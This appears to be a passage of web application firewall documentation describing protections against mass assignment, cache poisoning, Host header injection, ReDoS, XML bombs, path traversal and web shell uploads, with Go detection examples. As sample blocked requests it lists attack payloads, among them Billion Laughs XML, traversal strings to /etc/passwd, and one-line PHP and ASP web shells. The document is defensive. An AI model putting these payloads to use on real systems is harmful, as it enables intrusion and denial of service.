- Field Name Blacklist with Pattern Matching
- Whitelist-based Field Allowlisting
- Model Schema Validation
- Underscore/CamelCase Normalization
- Nested Object Detection
- Wildcard Parameter Rejection (*, **, [*])
Protection Modes
- BLOCK: Reject requests containing protected fields
- STRIP: Remove protected fields before processing
- ALERT: Log only, allow request (monitoring mode)
- AUTO: Block if score exceeds threshold
Example Blocked Requests
POST /api/users/register HTTP/1.1
Content-Type: application/json
{"username": "attacker", "email": "x@x.com", "is_admin": true}
PUT /api/profile/123 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
username=hacker&role=administrator&balance=999999
POST /api/update-user HTTP/1.1
user[name]=attack&user[privilege_level]=99&user[__v]=0
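The detection techniques above applied to the three blocked requests, as an added Go example (not CloFix code): recursive JSON traversal, bracket/dot form-key splitting, camelCase-to-snake_case normalization, and a STRIP mode that returns the cleaned body. The protected-field set is the one listed above; the "privilege|permission|role" prefix pattern is an assumption.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/url"
	"regexp"
	"sort"
	"strings"
	"unicode"
)

// protectedFields holds the names from the lists above in snake_case; input names
// are normalized before lookup so isAdmin and is_admin are the same field.
var protectedFields = map[string]bool{}

func init() {
	for _, f := range strings.Fields(`role roles is_admin admin privilege permissions
		is_active is_verified status account_status locked _id __v created_at updated_at version
		balance credits subscription_tier plan password password_confirmation current_password
		api_key access_token refresh_token session_id __proto__ constructor prototype * **`) {
		protectedFields[f] = true
	}
}

// protectedPattern catches variants such as privilege_level or privileges (assumed).
var protectedPattern = regexp.MustCompile(`^(privilege|permission|role)`)

// normalizeField turns camelCase into snake_case and lowercases the result.
func normalizeField(name string) string {
	var b strings.Builder
	for i, r := range name {
		if unicode.IsUpper(r) && i > 0 {
			b.WriteByte('_')
		}
		b.WriteRune(unicode.ToLower(r))
	}
	return b.String()
}

func isProtected(name string) bool {
	n := normalizeField(name)
	return protectedFields[n] || protectedPattern.MatchString(n)
}

// scanValue walks decoded JSON and records the dotted path of every protected field.
func scanValue(prefix string, v any, found *[]string) {
	switch t := v.(type) {
	case map[string]any:
		for k, child := range t {
			p := k
			if prefix != "" {
				p = prefix + "." + k
			}
			if isProtected(k) {
				*found = append(*found, p)
			}
			scanValue(p, child, found)
		}
	case []any:
		for i, child := range t {
			scanValue(fmt.Sprintf("%s[%d]", prefix, i), child, found)
		}
	}
}

// scanJSON reports protected fields anywhere in a JSON body (BLOCK / ALERT modes).
func scanJSON(body []byte) ([]string, error) {
	var v any
	if err := json.Unmarshal(body, &v); err != nil {
		return nil, err
	}
	var found []string
	scanValue("", v, &found)
	sort.Strings(found)
	return found, nil
}

// stripValue deletes protected keys recursively (STRIP mode).
func stripValue(v any) any {
	switch t := v.(type) {
	case map[string]any:
		for k, child := range t {
			if isProtected(k) {
				delete(t, k)
				continue
			}
			t[k] = stripValue(child)
		}
	case []any:
		for i := range t {
			t[i] = stripValue(t[i])
		}
	}
	return v
}

// stripJSON returns the cleaned body plus the paths that were removed.
func stripJSON(body []byte) ([]byte, []string, error) {
	var v any
	if err := json.Unmarshal(body, &v); err != nil {
		return nil, nil, err
	}
	var removed []string
	scanValue("", v, &removed)
	sort.Strings(removed)
	out, err := json.Marshal(stripValue(v))
	return out, removed, err
}

// scanForm handles URL-encoded bodies and query strings, splitting bracket and
// dot notation (user[role], data.isAdmin, items[*]) into path segments.
func scanForm(body string) ([]string, error) {
	values, err := url.ParseQuery(body)
	if err != nil {
		return nil, err
	}
	var found []string
	for key := range values {
		segs := strings.FieldsFunc(key, func(r rune) bool { return r == '[' || r == ']' || r == '.' })
		for i, s := range segs {
			if isProtected(s) {
				found = append(found, strings.Join(segs[:i+1], "."))
			}
		}
	}
	sort.Strings(found)
	return found, nil
}

func main() {
	f, _ := scanJSON([]byte(`{"username": "attacker", "email": "x@x.com", "is_admin": true}`))
	fmt.Println("json:", f)
	f, _ = scanForm("user[name]=attack&user[privilege_level]=99&user[__v]=0")
	fmt.Println("form:", f)
}
```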
Cache Poisoning Protection
Prevents CDN, proxy, and application cache poisoning via header abuse
Blocks attackers from injecting malicious content into shared caches (CDN, reverse proxy, load balancer) using unkeyed header injection.
Attack Vectors Blocked
- X-Forwarded-Host: Cache key poisoning via host header
- X-Original-URL: Cache deception via URL rewriting
- X-Rewrite-URL: Path-based cache poisoning
- X-Forwarded-Path: Alternative path injection
- X-Forwarded-Port: Port-based cache variation
- X-Forwarded-Proto: HTTP/HTTPS cache confusion
- X-Forwarded-Scheme: Protocol mismatch attacks
- X-Original-Host: Alternate host injection
- X-Forwarded-For: Cache key manipulation via IP
- X-Real-IP: Client IP cache poisoning
- X-Custom-Header: Unkeyed header injection
- Vary Header Abuse: Cache DoS via varying headers
Protection Mechanisms
- Header Normalization & Validation
- Cache Key Normalization (remove unkeyed headers)
- Dangerous Header Stripping
- X-Forwarded Header Sanitization
- Cache Response Validation
- Duplicate Header Detection & Blocking
- Header Length Limiting
- Cache Purge Request Validation
- Cache-Key Whitelisting
- Response Variant Analysis
Protected Headers Automatically Stripped
- X-Forwarded-Host, X-Forwarded-Path, X-Forwarded-Port
- X-Original-URL, X-Rewrite-URL, X-Original-Host
- X-Forwarded-Server, X-Proxy-Host, X-Real-IP
- X-Forwarded-For (only first IP preserved for logs)
- Custom unkeyed headers configurable
Example Attack Blocked
GET / HTTP/1.1
Host: vulnerable.com
X-Forwarded-Host: evil.com
GET /admin/users HTTP/1.1
X-Original-URL: /index.html
X-Rewrite-URL: /cache-buster
GET /products/123 HTTP/1.1
X-Forwarded-Path: /malicious
Cache-Control: public, max-age=3600
Host Header Injection Protection
Prevents password reset poisoning, cache poisoning, and virtual host bypass attacks
Blocks attackers from manipulating the Host header to poison password reset links, bypass virtual host routing, and launch web cache deception attacks.
Attack Vectors Blocked
- Password Reset Poisoning: Host header modified to point to attacker domain
- Cache Poisoning: Malicious host header cached by CDN/proxy
- Virtual Host Bypass: Access restricted vhosts via host header
- Web Cache Deception: Host variation causing cache mismatch
- XSS via Host Reflection: Malicious script in host header
- DNS Rebinding: Host header pointing to internal IPs
- Port Injection: example.com:8080 bypassing port restrictions
- Localhost Attack: 127.0.0.1, localhost host values
- Line-Feed Injection: %0d%0a HTTP response splitting
- Duplicate Host Header: Multiple Host headers causing ambiguity
Protection Mechanisms
- Host Whitelist Validation (against configured domains)
- Port Stripping & Validation
- localhost/Private IP Blocking (127.0.0.1, 0.0.0.0, ::1, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)
- Duplicate Host Header Rejection
- CRLF Injection Prevention (\r\n, %0d%0a, %0a%0d)
- Null Byte Detection (%00, \x00)
- Path Traversal Detection (../, ..%2f)
- Host Length Validation (max 255 chars)
- Allowed Character Whitelist (a-z, 0-9, ., -, :)
- Automated Host Normalization
Configuration Options
- Allowed Domains List (primary + aliases)
- Block Private IPs (toggle)
- Block Localhost (toggle)
- Strip Port from Host (toggle)
- Case-Sensitive Validation (off by default)
Example Blocked Requests
POST /reset-password HTTP/1.1
Host: evil.com
Content-Type: application/json
{"email": "victim@example.com"}
GET /admin HTTP/1.1
Host: 127.0.0.1
GET /%0d%0aX-Forwarded-Host:evil.com HTTP/1.1
Host: vulnerable.com
Host: vulnerable.com
Host: evil.com
Host: vulnerable.com
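The protection mechanisms and configuration options of this section (and of the Host Header Validation section above) as one validation function, written here as an added Go example (not CloFix code). It takes every Host value a request carried so duplicates are visible, applies the character whitelist, the 255-character limit, port validation, the localhost/private-IP rules and the allowlist, and returns the canonical host to forward. The policy struct and sample allowlist are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"strconv"
	"strings"
)

// hostPolicy mirrors the configuration options listed above (assumed shape).
type hostPolicy struct {
	allowed      map[string]bool // lowercase bare hostnames: primary + aliases
	stripPort    bool
	blockPrivate bool
	blockLocal   bool
}

const maxHostLen = 255
const hostAlphabet = "abcdefghijklmnopqrstuvwxyz0123456789.-:" // whitelist from the list above

// validateHost returns the canonical host to forward, or the reason for rejection.
func validateHost(values []string, p hostPolicy) (string, error) {
	if len(values) != 1 {
		return "", fmt.Errorf("expected exactly one Host header, got %d", len(values))
	}
	raw := strings.ToLower(strings.TrimSpace(values[0])) // case-insensitive by default
	if raw == "" || len(raw) > maxHostLen {
		return "", errors.New("host missing or longer than 255 characters")
	}
	// Character whitelist: CRLF, %0d%0a, %00, ../ and similar junk all fail here.
	if strings.Trim(raw, hostAlphabet) != "" {
		return "", errors.New("host contains characters outside the whitelist")
	}
	host, port := raw, ""
	switch strings.Count(raw, ":") {
	case 0:
	case 1:
		host, port, _ = strings.Cut(raw, ":")
		if n, err := strconv.Atoi(port); err != nil || n < 1 || n > 65535 {
			return "", fmt.Errorf("invalid port %q", port)
		}
	default:
		return "", errors.New("malformed host: multiple colons") // also rejects bare IPv6 such as ::1
	}
	if host == "" || strings.HasPrefix(host, ".") || strings.HasSuffix(host, ".") || strings.Contains(host, "..") {
		return "", errors.New("malformed hostname")
	}
	if p.blockLocal && (host == "localhost" || strings.HasSuffix(host, ".localhost")) {
		return "", errors.New("localhost is not an allowed host")
	}
	if ip := net.ParseIP(host); ip != nil {
		if p.blockLocal && (ip.IsLoopback() || ip.IsUnspecified()) {
			return "", errors.New("loopback or unspecified address in Host")
		}
		if p.blockPrivate && (ip.IsPrivate() || ip.IsLinkLocalUnicast()) {
			return "", errors.New("private address in Host")
		}
	}
	if !p.allowed[host] {
		return "", fmt.Errorf("host %q not in allowlist", host)
	}
	if p.stripPort || port == "" {
		return host, nil
	}
	return host + ":" + port, nil
}

func main() {
	p := hostPolicy{allowed: map[string]bool{"example.com": true}, stripPort: true, blockPrivate: true, blockLocal: true}
	// Constructed samples mirroring the blocked requests shown above.
	for _, v := range [][]string{{"Example.COM:8080"}, {"evil.com"}, {"127.0.0.1"}, {"vulnerable.com", "evil.com"}} {
		h, err := validateHost(v, p)
		fmt.Printf("%v -> %q %v\n", v, h, err)
	}
}
```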
Regular Expression Denial of Service (ReDoS) Protection
Blocks catastrophic regex input patterns targeting vulnerable regex implementations
Prevents ReDoS attacks that exploit inefficient regular expressions with catastrophic backtracking to freeze or crash the server.
Attack Patterns Detected
- Nested Quantifiers: (a+)+, (a*)*, (a?)?
- Overlapping Alternations: (a|a)+, (a|aa)+
- Long Repetitions: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa with nested patterns
- Repeated Groups: (a+)*$, (.*)*
- Evil Regex Patterns: ^(([a-z])+.)+[A-Z]([a-z])+$
- Polynomial Time Patterns: (a|aa)+b, (a|a)+b
- Exponential Time Patterns: (a+)+$, ([a-zA-Z]+)*$
- Long Strings with Repetition: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
- Known ReDoS Payloads: From OWASP ReDoS list
- Low Character Variety + High Length: High entropy + repeating patterns
Detection Techniques
- Input Length Validation (max 10,000 chars default)
- Character Variety Analysis (low variety = suspicious)
- Repetition Pattern Detection (run-length encoding)
- Nested Pattern Matching (regex token parsing)
- Execution Timeouts (prevent DoS at runtime)
- Memory Usage Monitoring (abort excessive allocations)
- Known ReDoS Payload Database
- Adaptive Rate Limiting (throttle on detection)
- Automated Regex Static Analysis (pre-filter dangerous patterns)
Protection Thresholds
- Max Input Length: 10,000 characters (configurable)
- Max Repetition Count: 50 consecutive same chars
- Low Variety Threshold: < 5 unique chars in input
- Execution Timeout: 100ms per regex operation
- Block Threshold: Attack score ≥ 8/10
Example Blocked Payloads
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
(a+)+b pattern: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab
(a*)* pattern: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
(a|a)+ pattern: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
([a-zA-Z]+)*$ pattern: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
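The input-side heuristics above (length, character variety, run length, run-length repetition) combined into the 10-point attack score, as an added Go example that is not CloFix code. The thresholds are the ones listed; the point weights and the 20-character minimum for the variety check are assumptions. Go's own regexp package is RE2-based and cannot backtrack catastrophically, so the runtime-timeout technique is not demonstrated here.

```go
package main

import (
	"fmt"
	"strings"
	"unicode/utf8"
)

// Thresholds from the list above; the weights below are this example's own.
const (
	maxInputLen   = 10000
	maxRun        = 50
	lowVariety    = 5
	blockScore    = 8
	minLenVariety = 20 // short inputs naturally have few distinct characters (assumed)
)

type redosVerdict struct {
	Score   int
	Reasons []string
}

func (v redosVerdict) Block() bool { return v.Score >= blockScore }

// longestRun returns the longest run of one repeated rune and whether that run is
// followed by exactly one different final rune: the "aaaa...a!" shape that forces
// backtracking on patterns such as (a+)+$.
func longestRun(s string) (best int, trailingMismatch bool) {
	rs := []rune(s)
	run, bestEnd := 0, -1
	for i, r := range rs {
		if i > 0 && r == rs[i-1] {
			run++
		} else {
			run = 1
		}
		if run > best {
			best, bestEnd = run, i
		}
	}
	trailingMismatch = best >= 2 && bestEnd == len(rs)-2 && rs[len(rs)-1] != rs[bestEnd]
	return best, trailingMismatch
}

// repeatedUnit finds the smallest unit the input is an exact repetition of and
// how many times it repeats (a run-length view of "abababab...").
func repeatedUnit(s string) (unit string, times int) {
	n := len(s)
	for p := 1; p <= n/2; p++ {
		if n%p == 0 && strings.Repeat(s[:p], n/p) == s {
			return s[:p], n / p
		}
	}
	return s, 1
}

func scoreReDoS(input string) redosVerdict {
	v := redosVerdict{}
	add := func(points int, why string) { v.Score += points; v.Reasons = append(v.Reasons, why) }
	if len(input) > maxInputLen {
		add(10, "input exceeds maximum length")
		return v // nothing else is worth computing on oversized input
	}
	distinct := map[rune]bool{}
	for _, r := range input {
		distinct[r] = true
	}
	if utf8.RuneCountInString(input) >= minLenVariety && len(distinct) < lowVariety {
		add(4, "low character variety")
	}
	run, trailing := longestRun(input)
	if run >= maxRun {
		add(5, fmt.Sprintf("%d consecutive identical characters", run))
		if trailing {
			add(2, "long run followed by a single mismatching character")
		}
	}
	if _, times := repeatedUnit(input); times >= 20 {
		add(4, fmt.Sprintf("input is a short unit repeated %d times", times))
	}
	if v.Score > 10 {
		v.Score = 10
	}
	return v
}

func main() {
	// Constructed inputs: two payload shapes from above and one ordinary sentence.
	for _, s := range []string{strings.Repeat("a", 69) + "!", strings.Repeat("ab", 30), "The quick brown fox jumps over the lazy dog"} {
		v := scoreReDoS(s)
		fmt.Printf("block=%-5v score=%2d reasons=%v\n", v.Block(), v.Score, v.Reasons)
	}
}
```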
XML Bomb (Billion Laughs) Protection
Prevents quadratic blowup and entity expansion attacks in XML documents
Blocks XML denial-of-service attacks using entity expansion, nested entities, and external entity references (Billion Laughs, Quadratic Blowup).
Attack Types Blocked
- Billion Laughs Attack: Recursive entity expansion
- Quadratic Blowup: Large entity references causing memory exhaustion
- External Entity Expansion (XXE): File inclusion with expansion
- Deep Nesting: Highly nested XML elements
- Attribute Bomb: Excessive attributes per element
- Large CDATA Sections: Oversized character data
- XML Declaration Bomb: Large encoding declarations
- Namespace Bomb: Excessive XML namespaces
Protection Mechanisms
- Disable External Entity Resolution
- Disable DTD Processing (security-focused parsing)
- Entity Expansion Limit (max 10,000 expansions)
- Nested Entity Limit (max depth 10)
- Max Element Depth (max 100 levels)
- Max Attributes per Element (max 50)
- Max Content Length (configurable)
- Max CDATA Section Size (1MB default)
- Max Entity Parameter Count (max 100)
- Strict XML Parsing Mode
- Memory Usage Limits
- Processing Timeout (5 seconds max)
Safe XML Parsing Configuration
import ("bytes"; "encoding/xml")

decoder := xml.NewDecoder(bytes.NewReader(body))
decoder.Strict = true                 // reject malformed XML instead of recovering from it
decoder.Entity = map[string]string{}  // no custom entity mappings; only the five XML built-ins are recognized
decoder.CharsetReader = nil           // documents declaring a non-UTF-8 encoding are rejected, not transcoded
Example Attack Payloads
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;">
...
<!ENTITY lol9 "&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
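The safe decoder configuration above extended with the depth, attribute and text-size limits from the list, as an added Go example (not CloFix code). It walks the token stream and refuses any DOCTYPE outright, which is what "disable DTD processing" amounts to; Go's encoding/xml never expands DTD-declared entities and in strict mode errors on an undefined entity reference, so the limits are defense in depth against the other bomb types. The shortened payload (four entity levels instead of nine) and the element-count limit are constructed for the example.

```go
package main

import (
	"bytes"
	"encoding/xml"
	"errors"
	"fmt"
	"io"
	"strings"
)

// xmlLimits carries the thresholds listed above (MaxElements is this example's own).
type xmlLimits struct {
	MaxDepth    int
	MaxAttrs    int
	MaxTextSize int
	MaxElements int
}

func defaultXMLLimits() xmlLimits {
	return xmlLimits{MaxDepth: 100, MaxAttrs: 50, MaxTextSize: 1 << 20, MaxElements: 100000}
}

// parseWithLimits streams the document through the safe decoder and enforces the
// limits per token, so an oversized or malicious document is rejected before it
// is materialized into a tree.
func parseWithLimits(body []byte, lim xmlLimits) error {
	dec := xml.NewDecoder(bytes.NewReader(body))
	dec.Strict = true
	dec.Entity = map[string]string{}
	dec.CharsetReader = nil
	depth, elements := 0, 0
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return nil
		}
		if err != nil {
			return err // malformed XML or an undefined entity reference such as &lol9;
		}
		switch t := tok.(type) {
		case xml.Directive:
			if bytes.HasPrefix(bytes.ToUpper(bytes.TrimSpace(t)), []byte("DOCTYPE")) {
				return errors.New("DTD declarations are not accepted")
			}
		case xml.StartElement:
			depth++
			elements++
			if depth > lim.MaxDepth {
				return fmt.Errorf("element depth %d exceeds limit %d", depth, lim.MaxDepth)
			}
			if elements > lim.MaxElements {
				return fmt.Errorf("element count exceeds limit %d", lim.MaxElements)
			}
			if len(t.Attr) > lim.MaxAttrs {
				return fmt.Errorf("element <%s> has %d attributes, limit %d", t.Name.Local, len(t.Attr), lim.MaxAttrs)
			}
		case xml.EndElement:
			depth--
		case xml.CharData:
			if len(t) > lim.MaxTextSize {
				return fmt.Errorf("text node of %d bytes exceeds limit %d", len(t), lim.MaxTextSize)
			}
		}
	}
}

// billionLaughs is a constructed, shortened form of the payload shown above.
const billionLaughs = `<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>`

func main() {
	deep := strings.Repeat("<a>", 101) + strings.Repeat("</a>", 101)
	docs := map[string]string{"billion-laughs": billionLaughs, "deep-nesting": deep, "clean": `<order id="1"><item sku="x"/></order>`}
	for name, doc := range docs {
		fmt.Printf("%-14s -> %v\n", name, parseWithLimits([]byte(doc), defaultXMLLimits()))
	}
}
```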
Path Normalization Protection
Blocks path traversal bypasses using URL encoding, Unicode, and double encoding tricks
Prevents attackers from bypassing path-based access controls using URL encoding, Unicode normalization, null bytes, and double encoding tricks.
Attack Patterns Blocked
- Basic Path Traversal: ../, ..\\, .../
- URL Encoded: %2e%2e%2f, %2e%2e/
- Double Encoding: %252e%252e%252f, %252e%252e/
- Unicode Normalization: %c0%ae%c0%ae%c0%af (overlong UTF-8)
- Null Byte Injection: file.php%00.jpg, ..%00/
- Mixed Slashes: ..\\../, ..//../
- Directory Self-Reference: /./././etc/passwd
- Parent Directory Repetition: ....//....//....//etc/passwd
- Hex Encoding: %2E%2E%2F (uppercase/lowercase mix)
- Backslash Variants: ..%5c (Windows path separator)
- UTF-16 Encoding: %ff%fe%2e%00%2e%00%2f%00
- Path Prefix Bypass: /var/www/../../../etc/passwd
Protection Mechanisms
- Multi-layer URL Decoding (3-pass decode)
- Unicode Normalization (NFC/NFKD)
- Path Canonicalization (path.Clean())
- Null Byte Stripping
- Character Whitelist Validation
- Base Path Enforcement (chroot-style)
- Forbidden Pattern Detection
- Sensitive Path Blacklisting (/etc/passwd, /proc/, /root/)
- Backslash to Forward Slash Conversion
- Double Path Clean Validation
Example Blocked Paths
../../../etc/passwd
..%252f..%252f..%252fetc/passwd
....//....//....//etc/passwd
/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/var/www/../../../../etc/shadow
/..%c0%af..%c0%af..%c0%afetc/passwd
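The protection mechanisms above run in order over the blocked paths listed, as an added Go example (not CloFix code): bounded multi-pass decoding, backslash folding, null-byte and invalid-UTF-8 rejection (which is how the overlong %c0%af form surfaces), dot-segment rejection before path.Clean, the double-clean check and the sensitive-path blacklist. Treating any input that needed two decoding passes as double-encoded is an assumption; Unicode NFC/NFKD normalization is omitted because it needs a package outside the standard library.

```go
package main

import (
	"fmt"
	"net/url"
	"path"
	"strings"
	"unicode/utf8"
)

// sensitivePrefixes is the blacklist from the list above, checked on the canonical path.
var sensitivePrefixes = []string{"/etc/passwd", "/etc/shadow", "/proc/", "/root/"}

type pathVerdict struct {
	Canonical string // cleaned path when accepted
	Decodes   int    // decoding passes that changed the input
	Reason    string // empty when the request may pass
}

func checkPath(raw string) pathVerdict {
	v := pathVerdict{}
	cur := raw
	for i := 0; i < 3; i++ { // 3-pass decode: enough to expose double and triple encoding
		dec, err := url.PathUnescape(cur)
		if err != nil {
			if i == 0 {
				v.Reason = "malformed percent-encoding"
				return v
			}
			break // a literal '%' surfaced by the previous pass; stop decoding
		}
		if dec == cur {
			break
		}
		cur = dec
		v.Decodes++
	}
	if v.Decodes > 1 {
		v.Reason = "double-encoded path" // clients encode once; a second layer targets filters (assumed)
		return v
	}
	cur = strings.ReplaceAll(cur, `\`, "/") // Windows separator variants
	if strings.ContainsRune(cur, 0) {
		v.Reason = "null byte in path"
		return v
	}
	if !utf8.ValidString(cur) {
		v.Reason = "invalid UTF-8 after decoding (overlong or UTF-16 bytes)"
		return v
	}
	for _, seg := range strings.Split(cur, "/") { // before Clean, which would swallow them
		if len(seg) >= 2 && strings.Trim(seg, ".") == "" {
			v.Reason = "dot-segment traversal attempt: " + seg
			return v
		}
	}
	v.Canonical = path.Clean("/" + cur)
	if path.Clean(v.Canonical) != v.Canonical { // double path clean validation
		v.Reason = "path not stable under canonicalization"
		return v
	}
	for _, p := range sensitivePrefixes {
		if strings.HasPrefix(v.Canonical, p) {
			v.Reason = "sensitive path: " + p
			return v
		}
	}
	return v
}

func main() {
	// Constructed samples: blocked paths from above plus two ordinary requests.
	for _, p := range []string{"..%252f..%252f..%252fetc/passwd", "/..%c0%af..%c0%af..%c0%afetc/passwd", "/./././etc/passwd", "/images/photo%201.jpg", "/static/css/app.css"} {
		v := checkPath(p)
		fmt.Printf("%-40s decodes=%d canonical=%q reason=%q\n", p, v.Decodes, v.Canonical, v.Reason)
	}
}
```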
Web Shell Upload Protection
Detects and blocks web shell uploads including c99, r57, b374k, and China Chopper signatures
Prevents attackers from uploading web shells (backdoor scripts) that provide remote access and command execution on the server.
Detected Web Shell Types
- c99 Shell: c99.php, c99_madrid variants
- r57 Shell: r57.php, r57shell variants
- b374k Shell: b374k.php, b374k-mini variants
- China Chopper: caidao.asp, caidao.php
- WSO (Web Shell by oRb): wso.php, webshell.php
- ShellBot: IRC bot shells
- PHP Simple Shell: shell.php, cmd.php
- ASPX Shell: shell.aspx, cmd.aspx
- JSP Shell: shell.jsp, cmd.jsp
- Perl/CGI Shell: shell.cgi, cmd.pl
- Python Shell: shell.py, backdoor.py
- Node.js Shell: shell.js, backdoor.js
Detection Signatures
- System Command Functions: system(), exec(), shell_exec(), passthru(), popen()
- File Manipulation: file_put_contents(), fopen(), chmod()
- Code Execution: eval(), assert(), create_function()
- Base64 Decoding: base64_decode(), gzinflate(), str_rot13()
- Known Shell Signatures: $c99, $r57, b374k, wso_version
- Obfuscation Patterns: Multiple nested functions, concatenated strings
- Web Shell User-Agents: Mozilla/5.0 (Windows NT; r57shell)
- Filename Patterns: *shell*, *backdoor*, *cmd*
Protection Techniques
- Content-based Signature Matching
- MIME Type Validation (text/plain disguised as image)
- File Extension Blacklist (.php, .phtml, .php3, .asp, .aspx, .jsp, .jspx, .cgi, .pl, .py)
- Double Extension Detection (shell.jpg.php)
- Null Byte Poisoning Prevention (shell.php\x00.jpg)
- Code Obfuscation Detection
- Function Call Whitelist
- Heuristic Analysis (unusual combinations of dangerous functions)
- Entropy Analysis (high entropy = suspicious for encoded payloads)
- Anti-Virus Scanning Integration (optional)
Blocked File Extensions
- PHP: .php, .php3, .php4, .php5, .phtml, .phps
- ASP: .asp, .aspx, .ashx, .asmx, .asax
- JSP: .jsp, .jspx, .jws, .jsw
- CGI/Perl: .cgi, .pl, .pm
- Python: .py, .pyc
- Ruby: .rb, .rbw
- Shell: .sh, .bash, .zsh
Example Web Shell Signatures Blocked
<?php eval($_POST['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php @assert($_POST['c']); ?>
<?= `$_GET[cmd]` ?>
<% eval request("cmd") %>
<%@ Page Language="Jscript" %><%eval(Request.Item["cmd"],"unsafe");%>
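The upload checks above combined into one decision, as an added Go example (not CloFix code): every extension segment of the filename is tested against the blocked list (so shell.jpg.php is caught), null bytes are rejected, the declared MIME type is compared with the sniffed one, and the content is matched for a server tag plus a dangerous call fed by request input, which covers the signatures shown above. The signature regexes and the rule that a suspicious filename alone only adds a reason are assumptions.

```go
package main

import (
	"fmt"
	"net/http"
	"regexp"
	"strings"
)

// Executable extensions from the blocked list above; every segment of the name is checked.
var blockedExt = map[string]bool{}

func init() {
	for _, e := range strings.Fields(".php .php3 .php4 .php5 .phtml .phps .asp .aspx .ashx .asmx .asax .jsp .jspx .jws .jsw .cgi .pl .pm .py .pyc .rb .rbw .sh .bash .zsh") {
		blockedExt[e] = true
	}
}

var (
	serverTag     = regexp.MustCompile(`(?i)<\?(php|=)|<%|#!/`)
	dangerousCall = regexp.MustCompile(`(?i)\b(eval|assert|system|exec|shell_exec|passthru|popen|create_function|base64_decode|gzinflate)\b|\x60\s*\$_`)
	userInput     = regexp.MustCompile(`(?i)\$_(GET|POST|REQUEST|COOKIE)\b|request\s*[.(\[]`)
	shellName     = regexp.MustCompile(`(?i)shell|backdoor|cmd|c99|r57|b374k|wso`)
)

type uploadVerdict struct {
	Blocked bool
	Reasons []string
}

// checkUpload blocks on an executable extension, a null byte, a declared-vs-sniffed
// type mismatch, or a server tag with a dangerous call on request input; a
// suspicious filename pattern is recorded but does not block by itself.
func checkUpload(filename, declaredType string, content []byte) uploadVerdict {
	v := uploadVerdict{}
	block := func(why string) { v.Blocked = true; v.Reasons = append(v.Reasons, why) }
	if strings.ContainsRune(filename, 0) {
		block("null byte in filename")
	}
	parts := strings.Split(strings.ToLower(filename), ".")
	for _, p := range parts[1:] { // all extensions, so shell.jpg.php and shell.php.jpg are both caught
		if blockedExt["."+p] {
			block("executable extension ." + p)
		}
	}
	if shellName.MatchString(parts[0]) {
		v.Reasons = append(v.Reasons, "suspicious filename pattern")
	}
	sniffed := http.DetectContentType(content)
	if strings.HasPrefix(declaredType, "image/") && !strings.HasPrefix(sniffed, "image/") {
		block("declared " + declaredType + " but content sniffs as " + sniffed)
	}
	if serverTag.Match(content) && dangerousCall.Match(content) && userInput.Match(content) {
		block("web shell signature: server tag with dangerous call on request input")
	}
	return v
}

func main() {
	// Constructed uploads: two of the signatures shown above and one real JPEG header.
	jpeg := []byte{0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 'J', 'F', 'I', 'F', 0x00}
	samples := []struct {
		name, typ string
		body      []byte
	}{
		{"shell.jpg.php", "image/jpeg", []byte("<?php eval($_POST['cmd']); ?>")},
		{"avatar.png", "image/png", []byte("<?php system($_GET['cmd']); ?>")},
		{"photo.jpg", "image/jpeg", jpeg},
	}
	for _, s := range samples {
		fmt.Printf("%-14s -> %+v\n", s.name, checkUpload(s.name, s.typ, s.body))
	}
}
```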
Additional Security Features
Real-Time Alerts - Slack
Sends real-time security alerts and notifications to Slack channels.
- Instant threat notifications
- Custom alert rules
- Incident reporting
- Team collaboration
Lua Scripting Support
Custom security logic implementation using Lua scripting for flexibility.
- Custom rule creation
- Dynamic response logic
- Integration capabilities
- Extensible architecture
VPN Blocking
Detects and blocks requests from VPN services and proxy networks.
- VPN IP detection
- Proxy server blocking
- Anonymizer detection
- Datacenter proxy filtering
Bad Bot Blocking
Identifies and blocks malicious bot traffic while allowing legitimate bots.
- Malicious bot detection
- Scraper blocking
- Credential stuffing prevention
- Automated attack mitigation
Agent UA Blocking
Blocks requests based on suspicious or malicious User-Agent strings.
- Suspicious UA detection
- Empty UA blocking
- Known malicious UA filtering
- Custom UA rules
SEO Bot Analysis
Analyzes and validates legitimate search engine bots for SEO optimization.
- Googlebot verification
- Bingbot validation
- Reverse DNS checking
- Bot allowlisting
Signatures Blocking
Blocks requests matching known attack signatures from comprehensive databases.
- CVE signature matching
- Attack pattern detection
- Custom signature support
- Regular updates
Tor Exit Node Monitor and Blocking
Monitors and blocks requests from Tor exit nodes with real-time updates.
- Tor network monitoring
- Exit node detection
- Anonymous traffic blocking
- Custom exemptions
IP Blocking
Blocks requests from specific IP addresses or IP ranges with flexible rules.
- Single IP blocking
- CIDR range blocking
- Dynamic blacklisting
- Whitelist support
Path Blocking
Blocks access to specific URL paths and directories for granular control.
- Sensitive path protection
- Admin area blocking
- Pattern-based blocking
- Exception handling
Headers Blocking
Blocks requests containing specific HTTP headers or header patterns.
- Suspicious header filtering
- Header value validation
- Custom header rules
- Header injection prevention
